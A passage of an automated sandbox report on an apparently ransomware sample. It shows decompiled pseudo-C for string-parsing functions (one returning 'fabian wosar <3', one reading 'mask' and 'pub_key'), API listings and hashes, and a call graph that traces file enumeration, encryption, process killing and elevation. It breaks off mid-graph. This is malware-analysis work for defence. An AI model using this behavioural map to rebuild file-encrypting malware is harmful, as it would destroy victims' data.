                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ConditionMask$InfoVerifyVersion_memset
                                        • String ID:
                                        • API String ID: 3299124433-0
                                        • Opcode ID: 560b0a49db54a50b0a02fd499674f6e02c569c082199c926f4dd112a374a71e7
                                        • Instruction ID: a65a64fb9c4448dbeec8597463ba79bcef18bcc8ba4e8eb0144d97b2c794a4d1
                                        • Opcode Fuzzy Hash: 560b0a49db54a50b0a02fd499674f6e02c569c082199c926f4dd112a374a71e7
                                        • Instruction Fuzzy Hash: 1A111BB0D4431C6EEB609F65DC0ABEA7ABCEB08700F008199A648E61C1D6B95B948FD5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 97%
                                        			E0FC64CD0(intOrPtr* __ecx, CHAR* __edx, intOrPtr* _a4) {
                                        				CHAR* _v8;
                                        				char _v12;
                                        				char _v20;
                                        				char _t16;
                                        				char _t20;
                                        				char _t21;
                                        				intOrPtr* _t24;
                                        				intOrPtr _t25;
                                        				intOrPtr _t26;
                                        				intOrPtr* _t29;
                                        				CHAR* _t33;
                                        				intOrPtr _t34;
                                        				intOrPtr _t35;
                                        				void* _t38;
                                        				void* _t41;
                                        				intOrPtr* _t42;
                                        				void* _t47;
                                        				void* _t49;
                                        				intOrPtr* _t51;
                                        				CHAR* _t53;
                                        
                                        				asm("movq xmm0, [0xfc6fa84]");
                                        				_t16 =  *0xfc6fa8c; // 0x0
                                        				_t29 = _a4;
                                        				_v8 = __edx;
                                        				_t51 = __ecx;
                                        				asm("movq [ebp-0x10], xmm0");
                                        				_v12 = _t16;
                                        				if( *_t29 == 0) {
                                        					L11:
                                        					if(_t51 == 0) {
                                        						goto L10;
                                        					} else {
                                        						if(_v20 == 0) {
                                        							L22:
                                        							if(_t51 == 0) {
                                        								goto L10;
                                        							} else {
                                        								_t53 = _t51 + lstrlenA( &_v20);
                                        								while(1) {
                                        									_t20 =  *_t53;
                                        									if(_t20 >= 0x30 && _t20 <= 0x39) {
                                        										break;
                                        									}
                                        									_t53 =  &(_t53[1]);
                                        								}
                                        								_t33 = _t53;
                                        								while(1) {
                                        									_t21 =  *_t33;
                                        									if(_t21 < 0x30 || _t21 > 0x39) {
                                        										goto L30;
                                        									}
                                        									L31:
                                        									_t33 =  &(_t33[1]);
                                        									continue;
                                        									L30:
                                        									if(_t21 == 0x2e) {
                                        										goto L31;
                                        									}
                                        									 *_t33 = 0;
                                        									return lstrcpyA(_v8, _t53);
                                        									goto L33;
                                        								}
                                        							}
                                        						} else {
                                        							_t34 =  *_t51;
                                        							if(_t34 != 0) {
                                        								_t47 = _t51 -  &_v20;
                                        								do {
                                        									_t24 =  &_v20;
                                        									if(_t34 == 0) {
                                        										L19:
                                        										if( *_t24 == 0) {
                                        											goto L22;
                                        										} else {
                                        											goto L20;
                                        										}
                                        									} else {
                                        										while(1) {
                                        											_t35 =  *_t24;
                                        											if(_t35 == 0) {
                                        												goto L22;
                                        											}
                                        											_t41 =  *((char*)(_t47 + _t24)) - _t35;
                                        											if(_t41 != 0) {
                                        												goto L19;
                                        											} else {
                                        												_t24 = _t24 + 1;
                                        												if( *((intOrPtr*)(_t47 + _t24)) != _t41) {
                                        													continue;
                                        												} else {
                                        													goto L19;
                                        												}
                                        											}
                                        											goto L33;
                                        										}
                                        										goto L22;
                                        									}
                                        									goto L33;
                                        									L20:
                                        									_t34 =  *((intOrPtr*)(_t51 + 1));
                                        									_t51 = _t51 + 1;
                                        									_t47 = _t47 + 1;
                                        								} while (_t34 != 0);
                                        							}
                                        							goto L10;
                                        						}
                                        					}
                                        				} else {
                                        					_t25 =  *__ecx;
                                        					if(_t25 == 0) {
                                        						L10:
                                        						return lstrcpyA(_v8, "fabian wosar <3");
                                        					} else {
                                        						_t49 = __ecx - _t29;
                                        						do {
                                        							_t42 = _t29;
                                        							if(_t25 == 0) {
                                        								L8:
                                        								if( *_t42 == 0) {
                                        									goto L11;
                                        								} else {
                                        									goto L9;
                                        								}
                                        							} else {
                                        								while(1) {
                                        									_t26 =  *_t42;
                                        									if(_t26 == 0) {
                                        										goto L11;
                                        									}
                                        									_t38 =  *((char*)(_t49 + _t42)) - _t26;
                                        									if(_t38 != 0) {
                                        										goto L8;
                                        									} else {
                                        										_t42 = _t42 + 1;
                                        										if( *((intOrPtr*)(_t49 + _t42)) != _t38) {
                                        											continue;
                                        										} else {
                                        											goto L8;
                                        										}
                                        									}
                                        									goto L33;
                                        								}
                                        								goto L11;
                                        							}
                                        							goto L33;
                                        							L9:
                                        							_t25 =  *((intOrPtr*)(_t51 + 1));
                                        							_t51 = _t51 + 1;
                                        							_t49 = _t49 + 1;
                                        						} while (_t25 != 0);
                                        						goto L10;
                                        					}
                                        				}
                                        				L33:
                                        			}
                                        0x0fc64cd6
                                        0x0fc64cde
                                        0x0fc64ce4
                                        0x0fc64ce9
                                        0x0fc64cec
                                        0x0fc64cf1
                                        0x0fc64cf6
                                        0x0fc64cf9
                                        0x0fc64d4a
                                        0x0fc64d4c
                                        0x00000000
                                        0x0fc64d4e
                                        0x0fc64d52
                                        0x0fc64d8f
                                        0x0fc64d91
                                        0x00000000
                                        0x0fc64d93
                                        0x0fc64d9d
                                        0x0fc64da0
                                        0x0fc64da0
                                        0x0fc64da4
                                        0x00000000
                                        0x00000000
                                        0x0fc64daa
                                        0x0fc64daa
                                        0x0fc64dad
                                        0x0fc64db0
                                        0x0fc64db0
                                        0x0fc64db4
                                        0x00000000
                                        0x00000000
                                        0x0fc64dbe
                                        0x0fc64dbe
                                        0x00000000
                                        0x0fc64dba
                                        0x0fc64dbc
                                        0x00000000
                                        0x00000000
                                        0x0fc64dc5
                                        0x0fc64dd4
                                        0x00000000
                                        0x0fc64dd4
                                        0x0fc64db0
                                        0x0fc64d54
                                        0x0fc64d54
                                        0x0fc64d58
                                        0x0fc64d5f
                                        0x0fc64d61
                                        0x0fc64d61
                                        0x0fc64d66
                                        0x0fc64d7f
                                        0x0fc64d82
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0fc64d68
                                        0x0fc64d68
                                        0x0fc64d68
                                        0x0fc64d6c
                                        0x00000000
                                        0x00000000
                                        0x0fc64d75
                                        0x0fc64d77
                                        0x00000000
                                        0x0fc64d79
                                        0x0fc64d79
                                        0x0fc64d7d
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0fc64d7d
                                        0x00000000
                                        0x0fc64d77
                                        0x00000000
                                        0x0fc64d68
                                        0x00000000
                                        0x0fc64d84
                                        0x0fc64d84
                                        0x0fc64d87
                                        0x0fc64d88
                                        0x0fc64d89
                                        0x0fc64d8d
                                        0x00000000
                                        0x0fc64d58
                                        0x0fc64d52
                                        0x0fc64cfb
                                        0x0fc64cfb
                                        0x0fc64cff
                                        0x0fc64d35
                                        0x0fc64d49
                                        0x0fc64d01
                                        0x0fc64d03
                                        0x0fc64d05
                                        0x0fc64d05
                                        0x0fc64d09
                                        0x0fc64d27
                                        0x0fc64d2a
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0fc64d0b
                                        0x0fc64d10
                                        0x0fc64d10
                                        0x0fc64d14
                                        0x00000000
                                        0x00000000
                                        0x0fc64d1d
                                        0x0fc64d1f
                                        0x00000000
                                        0x0fc64d21
                                        0x0fc64d21
                                        0x0fc64d25
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0fc64d25
                                        0x00000000
                                        0x0fc64d1f
                                        0x00000000
                                        0x0fc64d10
                                        0x00000000
                                        0x0fc64d2c
                                        0x0fc64d2c
                                        0x0fc64d2f
                                        0x0fc64d30
                                        0x0fc64d31
                                        0x00000000
                                        0x0fc64d05
                                        0x0fc64cff
                                        0x00000000

                                        APIs
                                        • lstrcpyA.KERNEL32(?,fabian wosar <3,?,0FC65034), ref: 0FC64D3D
                                        • lstrlenA.KERNEL32(00000000,?,0FC65034), ref: 0FC64D97
                                        • lstrcpyA.KERNEL32(?,?,?,0FC65034), ref: 0FC64DC8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
• Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen
                                        • String ID: fabian wosar <3
                                        • API String ID: 367037083-1724090804
                                        • Opcode ID: 22668b3d931b376d540a0b54bcddec2e006ccad6ba8016287f3429b2b06e8f62
                                        • Instruction ID: ab07503141e5f13af24848452f54378410a217502a7a542597d6124fad8e830e
                                        • Opcode Fuzzy Hash: 22668b3d931b376d540a0b54bcddec2e006ccad6ba8016287f3429b2b06e8f62
                                        • Instruction Fuzzy Hash: 3631F621C0C2A95ACB3FDE78D4E23FABFA6AF43541F9852D9C9D15B207D2216646C390
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0FC63190(CHAR* _a4) {
                                        				char _t6;
                                        				CHAR* _t13;
                                        				CHAR* _t16;
                                        
                                        				_t13 = _a4;
                                        				_t16 = _t13;
                                        				if( *_t13 == 0) {
                                        					L5:
                                        					lstrcmpiA(_t13, "mask");
                                        					_t10 =  ==  ? 1 : 0;
                                        					lstrcmpiA(_a4, "pub_key");
                                        					 *_t16 = 0x3d;
                                        					_t11 =  ==  ? 2 :  ==  ? 1 : 0;
                                        					_t5 =  ==  ? 2 :  ==  ? 1 : 0;
                                        					return  ==  ? 2 :  ==  ? 1 : 0;
                                        				} else {
                                        					while(1) {
                                        						_t6 =  *_t16;
                                        						if(_t6 == 0x7d) {
                                        							break;
                                        						}
                                        						if(_t6 == 0x3d) {
                                        							 *_t16 = 0;
                                        							goto L5;
                                        						} else {
                                        							_t16 =  &(_t16[1]);
                                        							if( *_t16 != 0) {
                                        								continue;
                                        							} else {
                                        								goto L5;
                                        							}
                                        						}
                                        						goto L8;
                                        					}
                                        					return 0;
                                        				}
                                        				L8:
                                        			}
                                        0x0fc63193
                                        0x0fc63197
                                        0x0fc6319c
                                        0x0fc631b0
                                        0x0fc631b9
                                        0x0fc631ce
                                        0x0fc631d1
                                        0x0fc631d9
                                        0x0fc631e1
                                        0x0fc631e4
                                        0x0fc631e9
                                        0x0fc631a0
                                        0x0fc631a0
                                        0x0fc631a0
                                        0x0fc631a4
                                        0x00000000
                                        0x00000000
                                        0x0fc631a8
                                        0x0fc631ec
                                        0x00000000
                                        0x0fc631aa
                                        0x0fc631aa
                                        0x0fc631ae
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0fc631ae
                                        0x00000000
                                        0x0fc631a8
                                        0x0fc631f5
                                        0x0fc631f5
                                        0x00000000

                                        APIs
                                        • lstrcmpiA.KERNEL32(0FC652F0,mask,0FC652F1,?,?,0FC63441,0FC652F1,00000000,00000000,74CB6980,?,?,0FC652F0,00000000), ref: 0FC631B9
                                        • lstrcmpiA.KERNEL32(0FC652F0,pub_key,?,0FC63441,0FC652F1,00000000,00000000,74CB6980,?,?,0FC652F0,00000000), ref: 0FC631D1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
• Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcmpi
                                        • String ID: mask$pub_key
                                        • API String ID: 1586166983-1355590148
                                        • Opcode ID: 49180f3f35f83de406178e795cfa8b6ce5642d6746cd4eeafd8d51558072e6af
                                        • Instruction ID: a9c964e2f5e8ca562795662212e664f3e73711c786285ad5236a447577f1d543
                                        • Opcode Fuzzy Hash: 49180f3f35f83de406178e795cfa8b6ce5642d6746cd4eeafd8d51558072e6af
                                        • Instruction Fuzzy Hash: 61F0F67230C2C52EE7154A68ACC77A1BBC99B45311F94057EE68AC2292D6AA9881C764
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Execution Graph

                                        Execution Coverage:5.6%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:0%
                                        Total number of Nodes:700
                                        Total number of Limit Nodes:10
                                        execution_graph 2339 f9d6d09 2340 f9d6d10 lstrcmpW 2339->2340 2341 f9d6d2a lstrcmpW 2340->2341 2342 f9d6db3 FindNextFileW 2340->2342 2341->2342 2344 f9d6d40 lstrcatW 2341->2344 2342->2340 2343 f9d6dcb FindClose 2342->2343 2345 f9d6dd4 2343->2345 2346 f9d6d53 lstrcatW 2344->2346 2349 f9d6d6c 2344->2349 2350 f9d6c90 2346->2350 2349->2342 2369 f9d6950 VirtualAlloc wsprintfW 2349->2369 2377 f9d6640 VirtualAlloc 2350->2377 2352 f9d6ca6 2353 f9d6dd4 2352->2353 2389 f9d6a40 lstrlenW lstrcatW FindFirstFileW 2352->2389 2353->2349 2355 f9d6cb5 2355->2353 2404 f9d6be0 VirtualAlloc wsprintfW CreateFileW 2355->2404 2357 f9d6cc2 lstrlenW lstrcatW FindFirstFileW 2358 f9d6cf8 2357->2358 2359 f9d6d04 2357->2359 2358->2349 2360 f9d6d10 lstrcmpW 2359->2360 2361 f9d6d2a lstrcmpW 2360->2361 2362 f9d6db3 FindNextFileW 2360->2362 2361->2362 2364 f9d6d40 lstrcatW 2361->2364 2362->2360 2363 f9d6dcb FindClose 2362->2363 2363->2353 2365 f9d6d53 lstrcatW 2364->2365 2368 f9d6d6c 2364->2368 2366 f9d6c90 102 API calls 2365->2366 2366->2368 2367 f9d6950 69 API calls 2367->2368 2368->2362 2368->2367 2412 f9d6850 2369->2412 2371 f9d69a7 VirtualFree 2371->2349 2372 f9d698a 2372->2371 2420 f9d6790 lstrlenW lstrlenW 2372->2420 2375 f9d69a3 2375->2371 2432 f9d35e0 GetFileAttributesW SetFileAttributesW 2375->2432 2379 f9d6667 2377->2379 2378 f9d676c VirtualFree 2378->2352 2379->2378 2380 f9d66e7 SHGetSpecialFolderPathW 2379->2380 2381 f9d66f8 2380->2381 2382 f9d6705 SHGetSpecialFolderPathW 2380->2382 2381->2378 2381->2382 2383 f9d671f SHGetSpecialFolderPathW 2382->2383 2384 f9d6712 2382->2384 2385 f9d672c 2383->2385 2386 f9d6739 SHGetSpecialFolderPathW 2383->2386 2384->2378 2384->2383 2385->2378 2385->2386 2387 f9d6746 2386->2387 2388 f9d6753 VirtualFree 2386->2388 2387->2378 2387->2388 2388->2352 2390 f9d6a90 lstrcmpW 2389->2390 2391 f9d6aa6 lstrcmpW 2390->2391 2392 f9d6bb2 FindNextFileW 2390->2392 2391->2392 2394 f9d6abc lstrcatW lstrlenW 2391->2394 2392->2390 
2393 f9d6bca FindClose 2392->2393 2393->2355 2395 f9d6adf 2394->2395 2395->2392 2396 f9d6af4 lstrcmpW 2395->2396 2399 f9d6b92 CloseHandle 2395->2399 2401 f9d6b81 VirtualFree 2395->2401 2402 f9d6b69 lstrlenA 2395->2402 2396->2395 2397 f9d6b04 CreateFileW GetFileSize 2396->2397 2398 f9d6b31 VirtualAlloc 2397->2398 2397->2399 2398->2395 2400 f9d6b46 ReadFile 2398->2400 2399->2393 2399->2395 2400->2395 2400->2401 2401->2395 2410 f9d69e0 lstrlenA 2402->2410 2405 f9d6c2c GetLastError 2404->2405 2406 f9d6c3e 2404->2406 2407 f9d6c70 VirtualFree 2405->2407 2408 f9d6c64 CloseHandle 2406->2408 2409 f9d6c47 lstrlenW WriteFile 2406->2409 2407->2357 2408->2407 2409->2408 2411 f9d69fa 2410->2411 2411->2395 2413 f9d686a lstrlenW 2412->2413 2414 f9d6860 2412->2414 2415 f9d6890 2413->2415 2416 f9d687e 2413->2416 2414->2372 2415->2372 2416->2415 2417 f9d689b lstrlenW VirtualAlloc wsprintfW 2416->2417 2419 f9d68d8 VirtualFree 2417->2419 2419->2372 2421 f9d67be lstrcmpiW 2420->2421 2424 f9d67ac 2420->2424 2422 f9d67dc lstrcmpiW 2421->2422 2423 f9d67d3 2421->2423 2422->2423 2425 f9d67e8 lstrcmpiW 2422->2425 2423->2375 2424->2421 2425->2423 2426 f9d67f4 lstrcmpiW 2425->2426 2426->2423 2427 f9d6800 lstrcmpiW 2426->2427 2427->2423 2428 f9d680c lstrcmpiW 2427->2428 2428->2423 2429 f9d6818 lstrcmpiW 2428->2429 2429->2423 2430 f9d6824 lstrcmpiW 2429->2430 2430->2423 2431 f9d6830 lstrcmpiW 2430->2431 2431->2375 2462 f9d63d0 2432->2462 2435 f9d82a0 9 API calls 2436 f9d36a5 2435->2436 2437 f9d82a0 9 API calls 2436->2437 2438 f9d36b5 VirtualAlloc VirtualAlloc 2437->2438 2464 f9d6530 EnterCriticalSection CryptAcquireContextW 2438->2464 2441 f9d372b MessageBoxA 2443 f9d39d8 VirtualFree 2441->2443 2442 f9d3757 2444 f9d6530 10 API calls 2442->2444 2443->2371 2445 f9d376c 2444->2445 2446 f9d3773 GetLastError 2445->2446 2447 f9d3792 2445->2447 2446->2443 2448 f9d37a5 CreateFileW 2447->2448 2449 f9d37cd VirtualFree VirtualFree 2448->2449 2450 f9d37fc VirtualAlloc VirtualAlloc 2448->2450 2449->2443 2451 
f9d3835 ReadFile 2450->2451 2452 f9d3940 VirtualFree 2451->2452 2460 f9d3832 _memmove 2451->2460 2453 f9d3958 WriteFile WriteFile WriteFile 2452->2453 2454 f9d3992 CloseHandle VirtualFree VirtualFree VirtualFree 2452->2454 2453->2454 2455 f9d39c9 MoveFileW 2454->2455 2456 f9d39d5 2454->2456 2455->2456 2456->2443 2457 f9d3888 VirtualAlloc 2457->2460 2458 f9d38a7 VirtualAlloc 2459 f9d38e5 VirtualFree SetFilePointer WriteFile 2458->2459 2458->2460 2459->2460 2461 f9d3927 VirtualFree 2459->2461 2460->2451 2460->2452 2460->2457 2460->2458 2460->2459 2460->2461 2461->2452 2461->2460 2463 f9d3626 VirtualAlloc lstrcpyW lstrcatW 2462->2463 2463->2435 2465 f9d659e CryptImportKey 2464->2465 2466 f9d6568 GetLastError 2464->2466 2468 f9d65c3 CryptGetKeyParam CryptEncrypt GetLastError 2465->2468 2469 f9d6622 CryptReleaseContext LeaveCriticalSection 2465->2469 2467 f9d6575 CryptAcquireContextW 2466->2467 2470 f9d3724 2466->2470 2467->2470 2471 f9d6595 2467->2471 2468->2469 2472 f9d661a 2468->2472 2469->2470 2470->2441 2470->2442 2471->2465 2472->2469 2473 f9d48a8 2474 f9d48b0 lstrcmpiW 2473->2474 2475 f9d48bf OpenProcess 2474->2475 2476 f9d48a4 2474->2476 2475->2476 2477 f9d48d1 TerminateProcess CloseHandle 2475->2477 2476->2474 2478 f9d48f4 Process32NextW 2476->2478 2477->2476 2478->2476 2479 f9d4907 2478->2479 2480 f9d4919 CloseHandle 2479->2480 2481 f9d490b VirtualFree 2479->2481 2481->2480 2210 f9d4bd5 2213 f9d64f0 VirtualFree VirtualFree 2210->2213 2212 f9d4be4 2213->2212 2214 f9d41d6 2222 f9d41e0 2214->2222 2215 f9d4286 2216 f9d43a8 VirtualFree 2215->2216 2217 f9d4377 VirtualAlloc 2215->2217 2220 f9d7c10 10 API calls 2216->2220 2217->2216 2219 f9d4394 wsprintfW 2217->2219 2218 f9d4210 lstrcpyW lstrlenW 2218->2215 2218->2222 2219->2216 2221 f9d43c8 2220->2221 2222->2215 2222->2218 1682 f9d4bf0 1683 f9d4c0d CreateThread 1682->1683 1684 f9d4c2b FindCloseChangeNotification 1683->1684 1685 f9d4c35 1683->1685 1686 f9d4950 Sleep 1683->1686 1684->1685 1731 f9d4600 1686->1731 1689 
f9d496a ExitProcess 1690 f9d4972 CreateThread 1691 f9d49bc 1690->1691 1692 f9d4990 WaitForSingleObject 1690->1692 1747 f9d46f0 CreateToolhelp32Snapshot VirtualAlloc 1691->1747 1693 f9d49a6 TerminateThread 1692->1693 1694 f9d49b2 CloseHandle 1692->1694 1693->1694 1694->1691 1696 f9d49c1 1758 f9d40e0 1696->1758 1700 f9d49ce 1701 f9d4a1c VirtualAlloc 1700->1701 1708 f9d4a6b 1700->1708 1703 f9d4a39 GetModuleFileNameW 1701->1703 1704 f9d4a63 ExitProcess 1701->1704 1702 f9d4aa5 1710 f9d4b18 1702->1710 1711 f9d4acf lstrlenA VirtualAlloc CryptStringToBinaryA 1702->1711 1781 f9d3be0 1703->1781 1708->1702 1709 f9d4a8f Sleep 1708->1709 1792 f9d5880 1708->1792 1709->1708 1836 f9d4030 1710->1836 1711->1710 1713 f9d4b10 ExitProcess 1711->1713 1714 f9d4b24 InitializeCriticalSection 1715 f9d4b35 1714->1715 1716 f9d4b42 1714->1716 1839 f9d4000 1715->1839 1845 f9d3e20 VirtualAlloc GetTickCount 1716->1845 1720 f9d4b4a DeleteCriticalSection 1853 f9d3aa0 AllocateAndInitializeSid 1720->1853 1722 f9d4b5a 1723 f9d4b63 VirtualAlloc 1722->1723 1857 f9d43e0 1722->1857 1725 f9d4baa 1723->1725 1726 f9d4b80 GetModuleFileNameW 1723->1726 1727 f9d4bcd ExitThread 1725->1727 1728 f9d4bb3 ShellExecuteW 1725->1728 1729 f9d3be0 17 API calls 1726->1729 1728->1727 1730 f9d4b99 VirtualFree 1729->1730 1730->1725 1864 f9d39f0 GetProcessHeap 1731->1864 1733 f9d4637 1865 f9d7330 1733->1865 1737 f9d4649 VirtualAlloc 1738 f9d4668 lstrcpyW lstrlenW 1737->1738 1951 f9d6f40 1738->1951 1741 f9d4699 CreateMutexW GetLastError 1742 f9d46ba VirtualFree 1741->1742 1743 f9d46b1 GetLastError 1741->1743 1977 f9d7c10 1742->1977 1743->1742 1748 f9d4888 1747->1748 1752 f9d489b 1747->1752 1749 f9d4893 Process32FirstW 1748->1749 1748->1752 1749->1752 1750 f9d48b0 lstrcmpiW 1751 f9d48bf OpenProcess 1750->1751 1750->1752 1751->1752 1753 f9d48d1 TerminateProcess CloseHandle 1751->1753 1752->1750 1754 f9d48f4 Process32NextW 1752->1754 1753->1752 1754->1752 1755 f9d4907 1754->1755 1756 f9d4919 CloseHandle 1755->1756 1757 f9d490b 
VirtualFree 1755->1757 1756->1696 1757->1756 1759 f9d43c8 1758->1759 1760 f9d40fb 1758->1760 1778 f9d6420 VirtualAlloc VirtualAlloc 1759->1778 2049 f9d39f0 GetProcessHeap 1760->2049 1762 f9d4126 1763 f9d7330 98 API calls 1762->1763 1764 f9d4132 1763->1764 1765 f9d7140 16 API calls 1764->1765 1766 f9d413e VirtualAlloc 1765->1766 1767 f9d4162 1766->1767 1768 f9d6f40 49 API calls 1767->1768 1769 f9d4180 1768->1769 1770 f9d418c lstrlenW 1769->1770 1777 f9d41c0 1770->1777 1771 f9d4286 1772 f9d43a8 VirtualFree 1771->1772 1773 f9d4377 VirtualAlloc 1771->1773 1776 f9d7c10 10 API calls 1772->1776 1773->1772 1775 f9d4394 wsprintfW 1773->1775 1774 f9d4210 lstrcpyW lstrlenW 1774->1771 1774->1777 1775->1772 1776->1759 1777->1771 1777->1774 2050 f9d62b0 CryptAcquireContextW 1778->2050 2058 f9d3b20 1781->2058 1783 f9d3bf6 1784 f9d3dfa VirtualFree 1783->1784 1785 f9d3aa0 4 API calls 1783->1785 1784->1704 1786 f9d3c03 1785->1786 1786->1784 1787 f9d3c0b ExpandEnvironmentStringsW wsprintfW VirtualAlloc GetForegroundWindow 1786->1787 1788 f9d3de0 ShellExecuteExW 1787->1788 1789 f9d3de7 1788->1789 1790 f9d3e01 WaitForSingleObject CloseHandle ExitProcess 1788->1790 1789->1788 1791 f9d3ded VirtualFree 1789->1791 1791->1784 2063 f9d39f0 GetProcessHeap 1792->2063 1794 f9d58c4 1795 f9d7330 98 API calls 1794->1795 1796 f9d58cd 1795->1796 1797 f9d7140 16 API calls 1796->1797 1798 f9d58d6 VirtualAlloc 1797->1798 1799 f9d590e 1798->1799 1800 f9d597b 6 API calls 1799->1800 1801 f9d5d44 1799->1801 1802 f9d59fa lstrlenA 1800->1802 1804 f9d5d4f VirtualFree 1801->1804 1805 f9d5a22 lstrlenA 1802->1805 1806 f9d7c10 10 API calls 1804->1806 1809 f9d5a72 lstrlenA 1805->1809 1815 f9d5a3e lstrlenA 1805->1815 1808 f9d5d65 1806->1808 1808->1708 1810 f9d5aa1 lstrcatW lstrlenW 1809->1810 1817 f9d5a7b lstrlenA 1809->1817 1811 f9d6f40 49 API calls 1810->1811 1814 f9d5ac9 12 API calls 1811->1814 1818 f9d5b6a lstrlenW 1814->1818 1816 f9d5a6e 1815->1816 1816->1809 1817->1810 1820 f9d9010 _memset 1818->1820 1821 
f9d5bcc lstrlenA 1820->1821 1822 f9d5bed 1821->1822 1823 f9d5c04 CryptBinaryToStringA 1822->1823 1824 f9d5c36 lstrlenA VirtualAlloc lstrlenA 1823->1824 1825 f9d5c30 GetLastError 1823->1825 1826 f9d5c5e lstrlenA 1824->1826 1825->1824 1828 f9d5c9e lstrlenA MultiByteToWideChar 1826->1828 1829 f9d5c77 lstrlenA 1826->1829 2064 f9d54a0 1828->2064 1829->1828 1833 f9d5d07 VirtualFree VirtualFree VirtualFree 1833->1801 1834 f9d5cd6 VirtualFree VirtualFree VirtualFree 1834->1804 1837 f9d403d VirtualAlloc 1836->1837 1838 f9d4058 1836->1838 1837->1838 1838->1714 1838->1838 1840 f9d4014 1839->1840 1841 f9d3e20 276 API calls 1840->1841 1842 f9d401c 1841->1842 2182 f9d64f0 VirtualFree VirtualFree 1842->2182 1844 f9d4024 1844->1720 1846 f9d3e80 GetDriveTypeW 1845->1846 1847 f9d3e95 1846->1847 1847->1846 1848 f9d3e9a CreateThread 1847->1848 1849 f9d3ede WaitForMultipleObjects GetTickCount 1847->1849 1848->1847 1850 f9d3f3f 1849->1850 2183 f9d5670 VirtualAlloc 1850->2183 1852 f9d3fed 1852->1720 1854 f9d3ade GetModuleHandleA GetProcAddress 1853->1854 1855 f9d3ada 1853->1855 1856 f9d3b00 FreeSid 1854->1856 1855->1722 1856->1722 1858 f9d3b20 4 API calls 1857->1858 1859 f9d43f4 VirtualAlloc 1858->1859 1861 f9d45af GetSystemDirectoryW lstrcatW ShellExecuteW 1859->1861 1862 f9d45ab 1859->1862 1863 f9d45df VirtualFree 1861->1863 1862->1863 1863->1723 1864->1733 1866 f9d736e 1865->1866 1867 f9d7349 VirtualAlloc GetUserNameW 1865->1867 1868 f9d7374 VirtualAlloc GetComputerNameW 1866->1868 1869 f9d7396 1866->1869 1867->1866 1868->1869 1870 f9d73f6 1869->1870 1871 f9d73a2 VirtualAlloc 1869->1871 1872 f9d7495 1870->1872 1873 f9d7400 VirtualAlloc RegOpenKeyExW 1870->1873 1871->1870 1874 f9d73b9 1871->1874 1877 f9d749f VirtualAlloc VirtualAlloc 1872->1877 1878 f9d7599 1872->1878 1875 f9d743c RegQueryValueExW 1873->1875 1876 f9d747e VirtualFree 1873->1876 1998 f9d72b0 RegOpenKeyExW 1874->1998 1880 f9d7469 GetLastError 1875->1880 1881 f9d7460 1875->1881 1876->1872 1884 f9d74d4 wsprintfW 
RegOpenKeyExW 1877->1884 1882 f9d759f VirtualAlloc 1878->1882 1883 f9d75fb 1878->1883 1885 f9d746f RegCloseKey 1880->1885 1881->1885 1886 f9d72b0 5 API calls 1882->1886 1888 f9d766e 1883->1888 1889 f9d7601 GetNativeSystemInfo VirtualAlloc 1883->1889 1887 f9d7509 RegQueryValueExW 1884->1887 1895 f9d752b 1884->1895 1885->1872 1885->1876 1894 f9d75cd 1886->1894 1887->1895 1896 f9d7534 GetLastError 1887->1896 1892 f9d768f 1888->1892 1893 f9d7674 1888->1893 1897 f9d7624 1889->1897 1898 f9d7647 wsprintfW 1889->1898 1890 f9d73d4 1890->1870 1891 f9d73f1 wsprintfW 1890->1891 1891->1870 1902 f9d77d9 1892->1902 1903 f9d7699 VirtualAlloc VirtualAlloc GetWindowsDirectoryW GetVolumeInformationW 1892->1903 2003 f9d7a10 VirtualAlloc VirtualAlloc 1893->2003 1894->1883 1906 f9d72b0 5 API calls 1894->1906 1895->1884 1899 f9d7576 wsprintfW VirtualFree 1895->1899 1904 f9d753a RegCloseKey 1895->1904 1896->1904 1897->1898 1905 f9d7632 wsprintfW ExitProcess 1897->1905 1898->1888 1899->1878 1910 f9d77e9 VirtualAlloc 1902->1910 1911 f9d7992 1902->1911 1908 f9d72b0 5 API calls 1903->1908 1904->1895 1909 f9d7549 lstrcmpiW 1904->1909 1912 f9d75ee wsprintfW 1906->1912 1907 f9d7688 1907->1892 1913 f9d7725 1908->1913 1909->1895 1909->1905 1931 f9d7840 1910->1931 1914 f9d799b VirtualAlloc 1911->1914 1915 f9d4640 1911->1915 1912->1883 1916 f9d7729 lstrlenW 1913->1916 1917 f9d775a wsprintfW lstrcatW GetModuleHandleW GetProcAddress 1913->1917 1921 